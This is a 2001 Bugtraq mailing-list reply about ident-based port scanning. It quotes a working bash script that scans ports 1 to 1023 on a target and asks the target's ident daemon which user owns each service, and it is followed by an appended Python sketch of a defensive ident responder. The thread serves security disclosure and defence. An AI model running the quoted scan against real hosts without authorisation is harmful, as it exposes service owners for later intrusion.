[18456] in bugtraq
Re: analysis of auditable port scanning techniques
daemon@ATHENA.MIT.EDU (Dan Harkless)
Mon Jan 8 12:49:13 2001
Message-ID: <200101061043.CAA22576@dilvish.speed.net>
Date: Sat, 6 Jan 2001 02:43:57 -0800
Reply-To: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
From: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
X-To: Rainer Weikusat <weikusat@mail.uni-mainz.de>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Message from Rainer Weikusat <weikusat@mail.uni-mainz.de> of "06 Jan 2001 10:50:31 +0100." <87ae95102g.fsf@winter.inter-i.uni-mainz.de>
Rainer Weikusat <weikusat@mail.uni-mainz.de> writes:
> Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET> writes:
> > > Using this grammar applied to the data we send to an arbitrary host piped
> > > to the ident/auth port will reveal the process owner running on a given
> > > port, even though we initiated the connection.
> >
> > Uh, no. With properly-written ident daemons, such as pidentd,
> -------------
> #!/bin/bash
> #
>
> if [ "$1" != sub ];
> then
>     export HOST=$(host $1 | awk '{ print $3; }')
>     declare -i I=1
>     export PPPID=$$
>
>     while [ $I -lt 1024 ];
>     do
>         (
>             export I
>             socket -r -p "$0 sub" $HOST $I 2>/dev/null
>         )
>
>         I=$(($I + 1))
>     done
> else
>     LOCAL=$(netstat -n | grep ":.\+$HOST:$I.\+EST" | awk '{print $4;}' | cut -d: -f2)
>     echo "$I,$LOCAL" | nc -w 1 $HOST auth >/proc/$PPPID/fd/1
>     kill $PPID
> fi
> -------------
>
> Just hacked up. Works wonderfully against pidentd 3.0.7-3 (Debian).
Thanks to those who corrected me on this. I did test my understanding
before posting, and I couldn't get my pidentd to respond for connections
that didn't originate on its machine, but obviously I was doing something
wrong (not sure what). A re-test just now reveals that indeed it will
respond correctly for connections not originating on the machine it's
running on.
Well, there's a feature request for auth/ident/tap daemons running on OSes
(if any) that can distinguish after-the-fact between connections that
originated locally and those that originated remotely. Assuming that
doesn't break RFCs 931 / 1413, of course (I'd re-read them right now to
check, if I had the time)...
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
dan-bugtraq@dilvish.speed.net | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.
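The feature request in the post above (an ident daemon that answers only for connections its own host initiated) can be sketched as a responder lookup. This is an added example, not code from the thread or from pidentd; it assumes the OS can report, per connection, whether the local socket came from connect() or accept(), which is modelled here by a constructed `locally_initiated` flag.

```python
"""RFC 1413 responder that refuses to name the owner of a connection that
was accepted by a local listener (i.e. originated remotely)."""
import re
from dataclasses import dataclass

# RFC 1413 query: "<port-on-server> , <port-on-client>" (server = this host).
QUERY_RE = re.compile(r"^\s*(\d{1,5})\s*,\s*(\d{1,5})\s*$")


@dataclass(frozen=True)
class Conn:
    local_port: int
    remote_port: int
    owner: str
    locally_initiated: bool  # assumed to come from the OS (connect vs accept)


# Constructed connection table for the example; not real data.
CONN_TABLE = [
    # sshd accepted this one: a remote scanner connected to our port 22.
    Conn(local_port=22, remote_port=40123, owner="root", locally_initiated=False),
    # alice's IRC client connected out to a server on port 6667.
    Conn(local_port=40200, remote_port=6667, owner="alice", locally_initiated=True),
]


def ident_response(query: str, table=CONN_TABLE) -> str:
    """Return the single reply line for one ident query (without CRLF)."""
    m = QUERY_RE.match(query)
    if not m:
        return "0 , 0 : ERROR : INVALID-PORT"
    server_port, client_port = int(m.group(1)), int(m.group(2))
    prefix = f"{server_port} , {client_port}"
    if not (1 <= server_port <= 65535 and 1 <= client_port <= 65535):
        return f"{prefix} : ERROR : INVALID-PORT"
    for c in table:
        if c.local_port == server_port and c.remote_port == client_port:
            if not c.locally_initiated:
                # The requested behaviour: a connection we merely accepted
                # reveals nothing about the listening service's owner.
                return f"{prefix} : ERROR : HIDDEN-USER"
            return f"{prefix} : USERID : UNIX : {c.owner}"
    return f"{prefix} : ERROR : NO-USER"


if __name__ == "__main__":
    for q in ("22 , 40123", "40200 , 6667", "25 , 1", "garbage"):
        print(repr(q), "->", ident_response(q))
```

With this rule the legitimate ident use case (an IRC or SMTP server asking the client's host who opened the outgoing connection) still works, while a query against a port the host is listening on gets HIDDEN-USER.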